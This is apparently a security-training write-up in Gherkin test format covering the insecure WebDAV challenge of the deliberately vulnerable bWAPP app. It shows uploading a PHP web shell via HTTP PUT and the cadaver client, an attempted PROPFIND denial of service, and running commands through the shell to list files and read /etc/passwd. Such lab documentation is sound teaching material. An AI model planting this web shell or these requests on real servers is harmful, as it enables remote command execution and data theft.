# language: en

Feature: Insecure WebDAV Configuration
  From system bWAPP
  From the A5 - Security Misconfiguration
  With Low security level
  Rule:
    REQ.181: https://fluidattacks.com/web/en/rules/181/

  Background:
    Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
    And I am running Burp Suite Community edition v1.7.30
    And I am running Metasploit 5.0.0-dev-888dc43
    And I am using cadaver 0.23.3
    Given the following in the url
      """
      URL: http://localhost/bWAPP/sm_webdav.php
      Message: Insecure WebDAV Configuration
      Details:
      - The Apache web server has an insecure WebDAV configuration!
      Objective: Attack the WebDAV Configuration
      """

  Scenario: Insecure WebDAV configuration
    Web Distributed Authoring and Versioning (WebDAV) is an
    extension of the HTTP protocol, which allows user
    to remotely add and manage the content of a web server.
    Given the webdav site with some documents in it
      """
      # http://192.168.75.128/webdav/
      [DIR]  Parent Directory     -
      [ ]  Iron_Maiden.pdf  02-Nov-2014 23:52   531K
      [ ]  Terminator_Salvation.pdf  02-Nov-2014 23:52   452K
      [ ]  The_Amazing_Spider-Man.pdf  02-Nov-2014 23:52   532K
      [ ]  The_Cabin_in_the_Woods.pdf  02-Nov-2014 23:52   514K
      [ ]  The_Dark_Knight_Rises.pdf  02-Nov-2014 23:52   739K
      [ ]  The_Incredible_Hulk.pdf  02-Nov-2014 23:52   604K
      [ ]  bWAPP_intro.pdf  02-Nov-2014 23:52   4.8M
      """
    Then I try to upload a shell
      """
      # Creating shell file
      # shell.php
      # 1  <?php
      # 2 $cmd=$_GET['cmd'];
      # 3  echo system($cmd);
      # 4 ?>
      #
      # Uploading shell
      skorn@Morgul ~/D/s/pentest-testing> curl -v
      http://192.168.75.128/webdav/shelly.php -X PUT
      *   Trying 192.168.75.128...
      * TCP_NODELAY set
      * Connected to 192.168.75.128 (192.168.75.128) port 80 (#0)
      > PUT /webdav/shelly.php HTTP/1.1
      > Host: 192.168.75.128
      > User-Agent: curl/7.60.0
      > Accept: */*
      ...
      ...
      < Content-Length: 362
      < Content-Type: text/html; charset=ISO-8859-1

      # Seems it got uploaded, let's see the content of that directory
      ...
      ...
      [ ]  The_Dark_Knight_Rises.pdf  02-Nov-2014 23:52   739K
      [ ]  The_Incredible_Hulk.pdf  02-Nov-2014 23:52   604K
      [ ]  bWAPP_intro.pdf  02-Nov-2014 23:52   4.8M
      [ ]  resource  03-Aug-2018 22:52   0
      [ ]  shell.php  03-Aug-2018 23:05   0
      ...
      ...
      """
    But it seems the content wasn't written
    Then I try to make a denial of service using the PROPFIND command
      """
      # Burp Request
      PROPFIND /webdav/ HTTP/1.1

      # Response
      PROPFIND requests with a Depth of "infinity" are not allowed for /webdav/.
      """
    But it seems the command isn't enabled
    Then I use cadaver (webdav client) to connect to the resource
      """
      # Using webdav client
      skorn@Morgul ~/D/f/t/s/b/a5-insecure-webdav-configuration> cadaver
      dav:!> open http://192.168.75.128/webdav
      dav:/webdav/>
      """
    But to be sure, I list the content
      """
      # webdav content:
      dav:/webdav/> ls
      Listing collection `/webdav/': succeeded.
      Iron_Maiden.pdf                   543803  Nov  2  2014
      Terminator_Salvation.pdf          462949  Nov  2  2014
      The_Amazing_Spider-Man.pdf        544600  Nov  2  2014
      The_Cabin_in_the_Woods.pdf        526187  Nov  2  2014
      The_Dark_Knight_Rises.pdf         756522  Nov  2  2014
      The_Incredible_Hulk.pdf           618117  Nov  2  2014
      bWAPP_intro.pdf                  5010042  Nov  2  2014
      resource                               0  Aug  3 15:52
      shell.php                              0  Aug  3 16:05
      """
    Then I edit the shell.php file
      """
      # Code to write:
      <?php
      $cmd=$_GET['cmd'];
      echo system($cmd);
      ?>

      # Editing the file
      dav:/webdav/> edit shell.php
      Locking `shell.php': succeeded.
      Downloading `/webdav/shell.php' to /tmp/cadaver-edit-JYfGF9.php [.]
      succeeded.
      Running editor: `vi /tmp/cadaver-edit-JYfGF9.php'...
      YouCompleteMe unavailable: requires Vim compiled with Python
      (2.7.1+ or 3.4+) support.
      Press ENTER or type command to continue
      Changes were made.
      Uploading changes to `/webdav/shell.php'
      Progress: [=============================>] 100.0% of 48 bytes succeeded.
      Unlocking `shell.php': succeeded.
      """
    And  I test if it works
      """
      # Request listing current directory
      http://192.168.75.128/webdav/shell.php?cmd=ls

      # Response
      Iron_Maiden.pdf
      Terminator_Salvation.pdf
      The_Amazing_Spider-Man.pdf
      The_Cabin_in_the_Woods.pdf
      The_Dark_Knight_Rises.pdf
      The_Incredible_Hulk.pdf bWAPP_intro.pdf
      resource shell.php
      shelly.php test.sh
      trve-exploit.sh
      trve-exploit.sh
      """
    Then I try to get the content of another file
      """
      # Request /etc/passwd content
      http://192.168.75.128/webdav/shell.php?cmd=cat%20../../../../etc/passwd

      # Response
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh
      sys:x:3:3:sys:/dev:/bin/sh
      sync:x:4:65534:sync:/bin:/bin/sync
      games:x:5:60:games:/usr/games:/bin/sh
      ...
      ...
      """
